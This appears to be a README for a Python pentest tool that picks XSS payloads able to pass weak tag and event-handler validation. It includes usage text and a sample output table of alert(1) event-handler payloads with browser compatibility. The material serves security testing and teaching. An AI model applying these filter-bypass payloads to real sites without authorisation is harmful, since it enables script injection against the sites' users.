# XSS tag_event analyzer

Script to test suitable XSS payloads when tag/events are validated in a weak way.

* [Blog Post](https://jlajara.gitlab.io/posts/2020/01/25/XSS_tag_event_analyzer.html)

## Usage:

```
usage: find_xss.py [-h] [-f FILE] [-t TAGS [TAGS ...]]
                   [-e EVENTS [EVENTS ...]] [-o OUTPUT]

Find suitable XSS Payloads.

optional arguments:
  -h, --help            show this help message and exit
  -f FILE, --file FILE  file with the payloads
  -t TAGS [TAGS ...], --tags TAGS [TAGS ...]
                        array with allowed tags
  -e EVENTS [EVENTS ...], --events EVENTS [EVENTS ...]
                        array with allowed events
  -o OUTPUT, --output OUTPUT
                        output payload list
```

## Example:

The script returns suitable payloads when valid tags `b blink details marquee blockquote` and valid events `oncontextmenu onhashchange onmouseout onpopstate` are detected:

```
❯ python find_xss.py -t b blink details marquee blockquote -e oncontextmenu onhashchange onmouseout onpopstate

Payloads found:

+--------------------------------------------------------+-----------------------------+
| Payload                                                |    Browser Compatibility    |
+--------------------------------------------------------+-----------------------------+
| <b oncontextmenu="alert(1)">test</b>                   | chrome firefox edge safari  |
| <blink oncontextmenu="alert(1)">test</blink>           | chrome firefox edge safari  |
| <blockquote oncontextmenu="alert(1)">test</blockquote> | chrome firefox edge safari  |
| <details oncontextmenu="alert(1)">test</details>       | chrome firefox edge safari  |
| <marquee oncontextmenu="alert(1)">test</marquee>       | chrome firefox edge safari  |
| <b onmouseout="alert(1)">test</b>                      | chrome firefox edge safari  |
| <blink onmouseout="alert(1)">test</blink>              | chrome firefox edge safari  |
| <blockquote onmouseout="alert(1)">test</blockquote>    | chrome firefox edge safari  |
| <details onmouseout="alert(1)">test</details>          | chrome firefox edge safari  |
| <marquee onmouseout="alert(1)">test</marquee>          | chrome firefox edge safari  |
+--------------------------------------------------------+-----------------------------+
```

